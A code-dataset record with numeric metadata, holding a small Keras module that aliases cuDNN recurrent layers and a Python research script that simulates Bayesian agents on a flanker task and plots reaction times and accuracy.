| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0e0724a94a27516f92a9731789959143ffb280f3
| 147
|
py
|
Python
|
keras/layers/cudnn_recurrent.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 5
|
2020-11-30T22:26:03.000Z
|
2020-12-01T22:34:25.000Z
|
keras/layers/cudnn_recurrent.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 10
|
2020-12-01T22:55:29.000Z
|
2020-12-11T18:31:46.000Z
|
keras/layers/cudnn_recurrent.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 15
|
2020-11-30T22:12:22.000Z
|
2020-12-09T01:32:48.000Z
|
"""Recurrent layers backed by cuDNN."""
from tensorflow.keras.layers import GRU as CuDNNGRU
from tensorflow.keras.layers import LSTM as CuDNNLSTM
| 29.4
| 53
| 0.802721
| 21
| 147
| 5.619048
| 0.666667
| 0.237288
| 0.322034
| 0.423729
| 0.525424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122449
| 147
| 4
| 54
| 36.75
| 0.914729
| 0.22449
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0e0bf588443d83048b5978f1011b07f114bf059c
| 53,758
|
py
|
Python
|
run_example_flanker.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
run_example_flanker.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
run_example_flanker.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 14 15:33:22 2021
@author: sarah
"""
import numpy as np
from misc import *
import world
import environment as env
import agent as agt
import perception as prc
import action_selection as asl
import itertools
import matplotlib.pylab as plt
from matplotlib.animation import FuncAnimation
from multiprocessing import Pool
from matplotlib.colors import LinearSegmentedColormap
import jsonpickle as pickle
import jsonpickle.ext.numpy as jsonpickle_numpy
import json
import seaborn as sns
import pandas as pd
import os
import scipy as sc
import scipy.signal as ss
import bottleneck as bn
import gc
np.set_printoptions(threshold = 100000, precision = 5)
"""
run function
"""
def run_agent(par_list, trials, T, ns, na, nr, nc, f, contexts, states, flankers, \
state_trans=None, correct_choice=None, congruent=None, pol_lambda=0, \
r_lambda=0, learn_habit=True):
#set parameters:
#learn_pol: initial concentration paramter for policy prior
#trans_prob: reward probability
#avg: True for average action selection, False for maximum selection
#Rho: Environment's reward generation probabilities as a function of time
#utility: goal prior, preference p(o)
learn_pol, trans_prob, Rho, utility, unc = par_list
"""
create matrices
"""
#generating probability of observations in each state
A = np.eye(ns)
#state transition generative probability (matrix)
if state_trans is None:
B = np.zeros((ns, ns, na))
for i in range(0,na):
B[i+1,:,i] += 1
else:
B = state_trans.copy()
# agent's beliefs about reward generation
# concentration parameters
C_alphas = np.ones((nr, ns, nc))
# initialize state in front of levers so that agent knows it yields no reward
C_alphas[:,:4,:] = np.array([100,1])[:,None,None]
# C_alphas[:,4:,1] = np.array([[100, 1],
# [1, 100]])
# C_alphas[:,4:,0] = np.array([[1, 100],
# [100, 1]])
# C_alphas[:,4,:] = np.array([learn_pol,1])[None,:,None]
# C_alphas[:,5,:] = np.array([1,learn_pol])[None,:,None]
# agent's initial estimate of reward generation probability
C_agent = np.zeros((nr, ns, nc))
for c in range(nc):
C_agent[:,:,c] = np.array([(C_alphas[:,i,c])/(C_alphas[:,i,c]).sum() for i in range(ns)]).T
# context transition matrix
if nc>1:
p = trans_prob
q = 1.-p
transition_matrix_context = np.zeros((nc, nc))
transition_matrix_context += q/(nc-1)
for i in range(nc):
transition_matrix_context[i,i] = p
else:
transition_matrix_context = np.array([[1]])
# context observation matrix
D = np.zeros((2,2)) + unc
for c in range(2):
D[c,c] = 1-(unc*(2-1))
if nc > 1:
# D = np.zeros((nc,nc)) + unc
# for c in range(nc):
# D[c,c] = 1-(unc*(nc-1))
D_agent = np.zeros((nc,nc)) + unc
for c in range(nc):
D_agent[c,c] = 1-(unc*(nc-1))
else:
D_agent = np.array([[1]])
"""
create environment (grid world)
"""
environment = env.Flanker(A, B, Rho, D, states, contexts, flankers, \
trials = trials, T = T,\
correct_choice=correct_choice, \
congruent=congruent)
"""
create policies
"""
pol = np.array(list(itertools.product(list(range(na)), repeat=T-1)))
npi = pol.shape[0]
# concentration parameters
alphas = np.zeros((npi, nc)) + learn_pol
alphas[:,0] = [learn_pol,1]#[10*learn_pol,learn_pol]
if nc>1:
alphas[:,1] = [1,learn_pol]#[learn_pol,10*learn_pol]
prior_pi = alphas / alphas.sum(axis=0)
"""
set state prior (where agent thinks it starts)
"""
state_prior = np.zeros((ns))
state_prior[:4] = 1./4
"""
set action selection method
"""
ac_sel = asl.DirichletSelector(trials=trials, T=T, number_of_actions=na, factor=f, calc_dkl=False, calc_entropy=False)
"""
set context prior
"""
if nc > 1:
prior_context = np.zeros((nc)) + 1./nc #0.1/(nc-1)
#prior_context[0] = 0.9
else:
prior_context = np.array([1])
"""
set up agent
"""
# perception
bayes_prc = prc.HierarchicalPerception(A, B, C_agent, transition_matrix_context,
state_prior, utility, prior_pi, alphas,
C_alphas, T=T, generative_model_context=D_agent,
pol_lambda=pol_lambda, r_lambda=r_lambda,
non_decaying=4)
# agent
bayes_pln = agt.BayesianPlanner(bayes_prc, ac_sel, pol,
trials = trials, T = T,
prior_states = state_prior,
prior_policies = prior_pi,
number_of_states = ns,
prior_context = prior_context,
learn_habit = learn_habit,
learn_rew = True,
#save_everything = True,
number_of_policies = npi,
number_of_rewards = nr)
"""
create world
"""
w = world.World(environment, bayes_pln, trials = trials, T = T)
"""
simulate experiment
"""
w.simulate_experiment(range(trials))
return w
"""
set condition dependent up parameters
"""
def run_flanker_simulations(repetitions, folder):
trials = 100
T = 2
ns = 6
na = 2
nr = 2
nc = 2
u = 0.99
utility = np.array([1-u,u])
f = 3.5
pol_lambda = 0.1
r_lambda = 0
Rho = np.zeros((trials, nr, ns))
for tendency in [1]:#[1,10,100,250,1000]:#[1,10,25,50,75,100, 250,1000]:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in [90,95,99]:#[95,96,97,98,99]
for unc in [0,0.1,0.2,0.3,0.5,0.7,1,5,10,15,20]:#[0,0.1,0.3,0.5,0.7,1,5,10]:#[0.1,1,5,10]:#[0,0.1,0.5,1,2,3,4,5,6,8,10]:
print(tendency, trans, unc)
# Rho[:], contexts, states, state_trans, correct_choice, congruent, num_in_run = \
# switching_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc, stable_length=5)
# plt.figure()
# plt.plot(Rho[:,2,2])
# plt.plot(Rho[:,1,1])
# plt.show()
if pol_lambda>0:
prefix = "alpha_"
else:
prefix = ""
if r_lambda > 0:
prefix += "beta_"
else:
prefix += ""
run_name = "flanker_"+prefix+"h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f"+str(f)+"_ut"+str(u)+".json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
if run_name in os.listdir(folder):
with open(fname, 'r') as infile:
data = json.load(infile)
worlds = pickle.decode(data)
print(len(worlds))
num_w_old = len(worlds)
else:
worlds = []
num_w_old = 0
learn_pol = tendency
parameters = [learn_pol, trans/100., Rho, utility, unc/100.]
for i in range(num_w_old, repetitions):
Rho[:], states, flankers, contexts, state_trans, correct_choice, congruent = \
flanker_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc)
worlds.append(run_agent(parameters, trials, T, ns, na, nr, nc,\
f, contexts, states, flankers, \
state_trans=state_trans, \
correct_choice=correct_choice, \
congruent=congruent, \
pol_lambda = pol_lambda,\
r_lambda = r_lambda))
w = worlds[-1]
print("============")
print(w.agent.perception.generative_model_rewards[:,:,0])
print(w.agent.perception.generative_model_rewards[:,:,1])
print("===")
print(w.agent.prior_policies[-1])
choices = w.actions[:,0]
correct = (choices == w.environment.correct_choice).sum()
print("percent correct:", correct/trials)
correct_cong = (choices[w.environment.congruent==1] == w.environment.correct_choice[w.environment.congruent==1]).sum()
print("percent correct congruent:", correct_cong/(w.environment.congruent==1).sum())
correct_incong = (choices[w.environment.congruent==0] == w.environment.correct_choice[w.environment.congruent==0]).sum()
print("percent correct incongruent:", correct_incong/(w.environment.congruent==0).sum())
RTs = w.agent.action_selection.RT[:,0]
RT_cong = np.median(RTs[w.environment.congruent==1])
RT_incong = np.median(RTs[w.environment.congruent==0])
print("congruent RT:", RT_cong)
print("incongruent RT:", RT_incong)
# plt.figure()
# post_pol = np.einsum('tpc,tc->tp', w.agent.posterior_policies[:,0,:,:], w.agent.posterior_context[:,0,:])
# like = np.einsum('tpc,tc->tp', w.agent.likelihood[:,0,:,:], w.agent.posterior_context[:,0,:])
# plt.plot(post_pol[:,1], '.')
# plt.plot(like[:,1], 'x')
# plt.ylim([0,1])
# plt.show()
# plt.figure()
# plt.plot(w.agent.action_selection.RT[:,0], '.')
# #plt.plot(Rho[:,2,2])
# #plt.plot(Rho[:,1,1])
# #plt.ylim([ESS*10,2000])
# plt.ylim([0,2000])
# plt.savefig("Dir_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#
# plt.show()
# plt.figure()
# plt.hist(w.agent.action_selection.RT[:,0])
# plt.savefig("uncertain_Dir_h"+str(int(learn_pol))+"_RT_hist"+str(i)+"_1000trials.svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_hist"+str(i)+".svg")#
# plt.show()
# plt.figure()
# plt.plot(w.agent.posterior_context[:,0,:], 'x')
# plt.show()
jsonpickle_numpy.register_handlers()
pickled = pickle.encode(worlds)
with open(fname, 'w') as outfile:
json.dump(pickled, outfile)
pickled = 0
worlds = 0
gc.collect()
def run_learningknockout_flanker_simulations(repetitions, folder):
trials = 100
T = 2
ns = 6
na = 2
nr = 2
nc = 2
u = 0.99
utility = np.array([1-u,u])
f = 3.5
pol_lambda = 0.1
r_lambda = 0
Rho = np.zeros((trials, nr, ns))
for tendency in [100]:#[1,10,100,250,1000]:#[1,10,25,50,75,100, 250,1000]:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in [90]:#[95,96,97,98,99]
for unc in [0.2]:#[0,0.1,0.3,0.5,0.7,1,5,10]:#[0.1,1,5,10]:#[0,0.1,0.5,1,2,3,4,5,6,8,10]:
print(tendency, trans, unc)
# Rho[:], contexts, states, state_trans, correct_choice, congruent, num_in_run = \
# switching_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc, stable_length=5)
# plt.figure()
# plt.plot(Rho[:,2,2])
# plt.plot(Rho[:,1,1])
# plt.show()
if pol_lambda>0:
prefix = "alpha_"
else:
prefix = ""
if r_lambda > 0:
prefix += "beta_"
else:
prefix += ""
run_name = "flanker_"+prefix+"h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f"+str(f)+"_ut"+str(u)+"_learningknockout.json"
print(run_name)
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
if run_name in os.listdir(folder):
with open(fname, 'r') as infile:
data = json.load(infile)
worlds = pickle.decode(data)
print(len(worlds))
num_w_old = len(worlds)
else:
worlds = []
num_w_old = 0
learn_pol = tendency
parameters = [learn_pol, trans/100., Rho, utility, unc/100.]
for i in range(num_w_old, repetitions):
Rho[:], states, flankers, contexts, state_trans, correct_choice, congruent = \
flanker_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc)
worlds.append(run_agent(parameters, trials, T, ns, na, nr, nc,\
f, contexts, states, flankers, \
state_trans=state_trans, \
correct_choice=correct_choice, \
congruent=congruent, \
pol_lambda = pol_lambda,\
r_lambda = r_lambda, learn_habit=False))
w = worlds[-1]
print("============")
print(w.agent.perception.generative_model_rewards[:,:,0])
print(w.agent.perception.generative_model_rewards[:,:,1])
print("===")
print(w.agent.prior_policies[-1])
choices = w.actions[:,0]
correct = (choices == w.environment.correct_choice).sum()
print("percent correct:", correct/trials)
correct_cong = (choices[w.environment.congruent==1] == w.environment.correct_choice[w.environment.congruent==1]).sum()
print("percent correct congruent:", correct_cong/(w.environment.congruent==1).sum())
correct_incong = (choices[w.environment.congruent==0] == w.environment.correct_choice[w.environment.congruent==0]).sum()
print("percent correct incongruent:", correct_incong/(w.environment.congruent==0).sum())
RTs = w.agent.action_selection.RT[:,0]
RT_cong = np.median(RTs[w.environment.congruent==1])
RT_incong = np.median(RTs[w.environment.congruent==0])
print("congruent RT:", RT_cong)
print("incongruent RT:", RT_incong)
# plt.figure()
# post_pol = np.einsum('tpc,tc->tp', w.agent.posterior_policies[:,0,:,:], w.agent.posterior_context[:,0,:])
# like = np.einsum('tpc,tc->tp', w.agent.likelihood[:,0,:,:], w.agent.posterior_context[:,0,:])
# plt.plot(post_pol[:,1], '.')
# plt.plot(like[:,1], 'x')
# plt.ylim([0,1])
# plt.show()
# plt.figure()
# plt.plot(w.agent.action_selection.RT[:,0], '.')_test
# #plt.plot(Rho[:,2,2])
# #plt.plot(Rho[:,1,1])
# #plt.ylim([ESS*10,2000])
# plt.ylim([0,2000])
# plt.savefig("Dir_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#
# plt.show()
# plt.figure()
# plt.hist(w.agent.action_selection.RT[:,0])
# plt.savefig("uncertain_Dir_h"+str(int(learn_pol))+"_RT_hist"+str(i)+"_1000trials.svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_hist"+str(i)+".svg")#
# plt.show()
# plt.figure()
# plt.plot(w.agent.posterior_context[:,0,:], 'x')
# plt.show()
jsonpickle_numpy.register_handlers()
pickled = pickle.encode(worlds)
with open(fname, 'w') as outfile:
json.dump(pickled, outfile)
pickled = 0
worlds = 0
gc.collect()
def run_priorknockout_flanker_simulations(repetitions, folder):
trials = 100
T = 2
ns = 6
na = 2
nr = 2
nc = 2
u = 0.99
utility = np.array([1-u,u])
f = 3.5
pol_lambda = 0.1
r_lambda = 0
Rho = np.zeros((trials, nr, ns))
for tendency in [1]:#[1,10,100,250,1000]:#[1,10,25,50,75,100, 250,1000]:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in [90]:#[95,96,97,98,99]
for unc in [0.2]:#[0,0.1,0.3,0.5,0.7,1,5,10]:#[0.1,1,5,10]:#[0,0.1,0.5,1,2,3,4,5,6,8,10]:
print(tendency, trans, unc)
# Rho[:], contexts, states, state_trans, correct_choice, congruent, num_in_run = \
# switching_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc, stable_length=5)
# plt.figure()
# plt.plot(Rho[:,2,2])
# plt.plot(Rho[:,1,1])
# plt.show()
if pol_lambda>0:
prefix = "alpha_"
else:
prefix = ""
if r_lambda > 0:
prefix += "beta_"
else:
prefix += ""
run_name = "flanker_"+prefix+"h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f"+str(f)+"_ut"+str(u)+"_priorknockout.json"
fname = os.path.join(folder, run_name)
print(fname)
jsonpickle_numpy.register_handlers()
if run_name in os.listdir(folder):
with open(fname, 'r') as infile:
data = json.load(infile)
worlds = pickle.decode(data)
print(len(worlds))
num_w_old = len(worlds)
else:
worlds = []
num_w_old = 0
learn_pol = tendency
parameters = [learn_pol, trans/100., Rho, utility, unc/100.]
for i in range(num_w_old, repetitions):
Rho[:], states, flankers, contexts, state_trans, correct_choice, congruent = \
flanker_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc)
worlds.append(run_agent(parameters, trials, T, ns, na, nr, nc,\
f, contexts, states, flankers, \
state_trans=state_trans, \
correct_choice=correct_choice, \
congruent=congruent, \
pol_lambda = pol_lambda,\
r_lambda = r_lambda, learn_habit=False))
w = worlds[-1]
print("============")
print(w.agent.perception.generative_model_rewards[:,:,0])
print(w.agent.perception.generative_model_rewards[:,:,1])
print("===")
print(w.agent.prior_policies[-1])
choices = w.actions[:,0]
correct = (choices == w.environment.correct_choice).sum()
print("percent correct:", correct/trials)
correct_cong = (choices[w.environment.congruent==1] == w.environment.correct_choice[w.environment.congruent==1]).sum()
print("percent correct congruent:", correct_cong/(w.environment.congruent==1).sum())
correct_incong = (choices[w.environment.congruent==0] == w.environment.correct_choice[w.environment.congruent==0]).sum()
print("percent correct incongruent:", correct_incong/(w.environment.congruent==0).sum())
RTs = w.agent.action_selection.RT[:,0]
RT_cong = np.median(RTs[w.environment.congruent==1])
RT_incong = np.median(RTs[w.environment.congruent==0])
print("congruent RT:", RT_cong)
print("incongruent RT:", RT_incong)
# plt.figure()
# post_pol = np.einsum('tpc,tc->tp', w.agent.posterior_policies[:,0,:,:], w.agent.posterior_context[:,0,:])
# like = np.einsum('tpc,tc->tp', w.agent.likelihood[:,0,:,:], w.agent.posterior_context[:,0,:])
# plt.plot(post_pol[:,1], '.')
# plt.plot(like[:,1], 'x')
# plt.ylim([0,1])
# plt.show()
# plt.figure()
# plt.plot(w.agent.action_selection.RT[:,0], '.')_test
# #plt.plot(Rho[:,2,2])
# #plt.plot(Rho[:,1,1])
# #plt.ylim([ESS*10,2000])
# plt.ylim([0,2000])
# plt.savefig("Dir_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#
# plt.show()
# plt.figure()
# plt.hist(w.agent.action_selection.RT[:,0])
# plt.savefig("uncertain_Dir_h"+str(int(learn_pol))+"_RT_hist"+str(i)+"_1000trials.svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_hist"+str(i)+".svg")#
# plt.show()
# plt.figure()
# plt.plot(w.agent.posterior_context[:,0,:], 'x')
# plt.show()
jsonpickle_numpy.register_handlers()
pickled = pickle.encode(worlds)
with open(fname, 'w') as outfile:
json.dump(pickled, outfile)
pickled = 0
worlds = 0
gc.collect()
def run_contextknockout_flanker_simulations(repetitions, folder):
trials = 100
T = 2
ns = 6
na = 2
nr = 2
nc = 2
u = 0.99
utility = np.array([1-u,u])
f = 3.5
pol_lambda = 0.1
r_lambda = 0
Rho = np.zeros((trials, nr, ns))
for tendency in [1]:#[1,10,100,250,1000]:#[1,10,25,50,75,100, 250,1000]:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in [90]:#[95,96,97,98,99]
for unc in [0.2]:#[0,0.1,0.3,0.5,0.7,1,5,10]:#[0.1,1,5,10]:#[0,0.1,0.5,1,2,3,4,5,6,8,10]:
print(tendency, trans, unc)
# Rho[:], contexts, states, state_trans, correct_choice, congruent, num_in_run = \
# switching_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc, stable_length=5)
# plt.figure()
# plt.plot(Rho[:,2,2])
# plt.plot(Rho[:,1,1])
# plt.show()
if pol_lambda>0:
prefix = "alpha_"
else:
prefix = ""
if r_lambda > 0:
prefix += "beta_"
else:
prefix += ""
run_name = "flanker_"+prefix+"h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f"+str(f)+"_ut"+str(u)+"_contextknockout.json"
fname = os.path.join(folder, run_name)
print(fname)
jsonpickle_numpy.register_handlers()
if run_name in os.listdir(folder):
with open(fname, 'r') as infile:
data = json.load(infile)
worlds = pickle.decode(data)
print(len(worlds))
num_w_old = len(worlds)
else:
worlds = []
num_w_old = 0
learn_pol = tendency
parameters = [learn_pol, trans/100., Rho, utility, unc/100.]
for i in range(num_w_old, repetitions):
Rho[:], states, flankers, contexts, state_trans, correct_choice, congruent = \
flanker_timeseries(trials, nr=nr, ns=ns, na=na, nc=nc)
worlds.append(run_agent(parameters, trials, T, ns, na, nr, 1,\
f, contexts, states, flankers, \
state_trans=state_trans, \
correct_choice=correct_choice, \
congruent=congruent, \
pol_lambda = pol_lambda,\
r_lambda = r_lambda, learn_habit=False))
w = worlds[-1]
print("============")
print(w.agent.perception.generative_model_rewards[:,:,0])
#print(w.agent.perception.generative_model_rewards[:,:,1])
print("===")
print(w.agent.prior_policies[-1])
choices = w.actions[:,0]
correct = (choices == w.environment.correct_choice).sum()
print("percent correct:", correct/trials)
correct_cong = (choices[w.environment.congruent==1] == w.environment.correct_choice[w.environment.congruent==1]).sum()
print("percent correct congruent:", correct_cong/(w.environment.congruent==1).sum())
correct_incong = (choices[w.environment.congruent==0] == w.environment.correct_choice[w.environment.congruent==0]).sum()
print("percent correct incongruent:", correct_incong/(w.environment.congruent==0).sum())
RTs = w.agent.action_selection.RT[:,0]
RT_cong = np.median(RTs[w.environment.congruent==1])
RT_incong = np.median(RTs[w.environment.congruent==0])
print("congruent RT:", RT_cong)
print("incongruent RT:", RT_incong)
# plt.figure()
# post_pol = np.einsum('tpc,tc->tp', w.agent.posterior_policies[:,0,:,:], w.agent.posterior_context[:,0,:])
# like = np.einsum('tpc,tc->tp', w.agent.likelihood[:,0,:,:], w.agent.posterior_context[:,0,:])
# plt.plot(post_pol[:,1], '.')
# plt.plot(like[:,1], 'x')
# plt.ylim([0,1])
# plt.show()
# plt.figure()
# plt.plot(w.agent.action_selection.RT[:,0], '.')_test
# #plt.plot(Rho[:,2,2])
# #plt.plot(Rho[:,1,1])
# #plt.ylim([ESS*10,2000])
# plt.ylim([0,2000])
# plt.savefig("Dir_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_timecourse"+str(i)+".svg")#
# plt.show()
# plt.figure()
# plt.hist(w.agent.action_selection.RT[:,0])
# plt.savefig("uncertain_Dir_h"+str(int(learn_pol))+"_RT_hist"+str(i)+"_1000trials.svg")#"ESS"+str(ESS)+"_h"+str(int(learn_pol))+"_RT_hist"+str(i)+".svg")#
# plt.show()
# plt.figure()
# plt.plot(w.agent.posterior_context[:,0,:], 'x')
# plt.show()
jsonpickle_numpy.register_handlers()
pickled = pickle.encode(worlds)
with open(fname, 'w') as outfile:
json.dump(pickled, outfile)
pickled = 0
worlds = 0
gc.collect()
def analyze_flanker_simulations(folder):
tendencies = [1,10,100, 250]#[1,10,25,50,75,100, 250,1000]#1,10,100,100
probs = [90,95,99]
uncertainties = [0,0.1,0.2,0.3,0.5,0.7,1,5,10]#,15,20]
run_name = "flanker_alpha_h"+str(int(tendencies[0]))+"_t"+str(probs[0])+"_u"+str(uncertainties[0])+"_f3.5_ut0.99.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
print(len(worlds_old))
repetitions = len(worlds_old)
trials = worlds_old[0].trials
num_types = len(tendencies)*len(probs)*len(uncertainties)
correct = np.zeros(repetitions*trials*num_types)
RT = np.zeros(repetitions*trials*num_types)
agent = np.zeros(repetitions*trials*num_types)
congruent = np.zeros(repetitions*trials*num_types)
trial_num = np.zeros(repetitions*trials*num_types)
epoch = np.zeros(repetitions*trials*num_types)
tend_arr = np.zeros(repetitions*trials*num_types)
prob_arr = np.zeros(repetitions*trials*num_types)
unc_arr = np.zeros(repetitions*trials*num_types)
binned_RT = np.zeros(repetitions*trials*num_types)
prev_congruent = np.zeros(repetitions*trials*num_types) - 1
non_dec_time = 100
bin_size = 250
t_s = 0.2
sim_type = 0
for tendency in tendencies:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in probs:#[100,99,98,97,96,95,94]:
for unc in uncertainties:
print(tendency, trans, unc)
run_name = "flanker_alpha_h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f3.5_ut0.99.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
repetitions = len(worlds_old)
trials = worlds_old[0].trials
offset = sim_type*repetitions*trials
for i in range(repetitions):
w = worlds_old[i]
correct[offset+i*trials:offset+(i+1)*trials] = (w.actions[:,0] == w.environment.correct_choice).astype(int)
RT[offset+i*trials:offset+(i+1)*trials] = t_s*w.agent.action_selection.RT[:,0] + non_dec_time
agent[offset+i*trials:offset+(i+1)*trials] = i
congruent[offset+i*trials:offset+(i+1)*trials] = np.logical_not(w.environment.congruent)
trial_num[offset+i*trials:offset+(i+1)*trials] = np.arange(0,trials)
epoch[offset+i*trials:offset+(i+1)*trials] = [-1]*10 + [0]*20 + [1]*20 + [2]*20 + [3]*(trials-70)
tend_arr[offset+i*trials:offset+(i+1)*trials] = tendency
prob_arr[offset+i*trials:offset+(i+1)*trials] = trans
unc_arr[offset+i*trials:offset+(i+1)*trials] = unc#/100
binned_RT[offset+i*trials:offset+(i+1)*trials] = t_s*(bin_size//2 + bin_size*(w.agent.action_selection.RT[:,0]//bin_size)) +non_dec_time
prev_congruent[offset+i*trials:offset+(i+1)*trials][1:] = congruent[offset+i*trials:offset+(i+1)*trials][:-1]
sim_type+=1
data_dict = {"correct": correct, "RT": RT, "agent": agent,
"congruent": congruent, "binned_RT": binned_RT,
"trial_num": trial_num, "epoch": epoch,
"uncertainty": unc_arr, "tendencies": tend_arr,
"trans_probs": prob_arr, "prev_cong": prev_congruent}
data = pd.DataFrame(data_dict)
# plt.figure()
# for i in range(0,3):
# sns.lineplot(x='num_in_run', y='RT', data=data.query('epoch == @i'), style='congruent', label=str(i), ci = 95, estimator=np.nanmean, linewidth=3)
# plt.show()
tendency=100
trans=90
unc=0.2
cutoff = non_dec_time + 500#5000#2*500
plt.figure()
plt.title("tendency "+str(tendency)+", trans "+str(trans))
sns.lineplot(x='uncertainty', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty<1.1 and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.ylim([200,1000])
plt.gca().invert_xaxis()
plt.show()
plt.figure()
plt.title("tendency "+str(tendency)+", trans "+str(trans))
sns.lineplot(x='trans_probs', y='RT', data=data.query('tendencies==@tendency and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.ylim([200,1000])
#plt.gca().invert_xaxis()
plt.show()
# accuracy
plt.figure()
#plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.plot([0+bin_size,cutoff-bin_size], [0.5,0.5], '--', color='grey', alpha=0.5)
plt.ylim([0,1.05])
plt.yticks(fontsize=16)
plt.xticks(fontsize=16)
plt.xlabel("RT", fontsize=16)
plt.ylabel("Prop correct", fontsize=16)
plt.savefig("accuracy.svg")
plt.show()
plt.figure()
plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', hue='trans_probs', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.ylim([0,1])
plt.show()
plt.figure()
plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and trans_probs==@trans and binned_RT<=@cutoff'), style='congruent', hue='uncertainty', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.ylim([0,1])
plt.show()
plt.figure()
sns.histplot(x='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and binned_RT<=@cutoff'), hue='congruent', binwidth=t_s*bin_size)
plt.savefig("RT_histogram.svg")
plt.show()
# gratton
plt.figure(figsize=(4,5))
palette = [(0,0,0), (0,0,0)]
#plt.title("tendency "+str(tendency)+", trans "+str(100trans)+", unc "+str(unc))
sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and trial_num>0'), style='congruent', hue='congruent', ci = 95, estimator=np.nanmean, linewidth=3, markers=True, markersize=12, palette=palette)
#plt.ylim([200,1000])
plt.xticks([0,1], labels=["CON", "INC"], fontsize=16)
plt.yticks(fontsize=16)
plt.xlim([-0.25,1.25])
plt.ylim([200,700])
plt.xlabel("Previous trial type", fontsize=16)
plt.ylabel("RT", fontsize=16)
plt.savefig("gratton.svg")
plt.show()
plt.figure()
plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
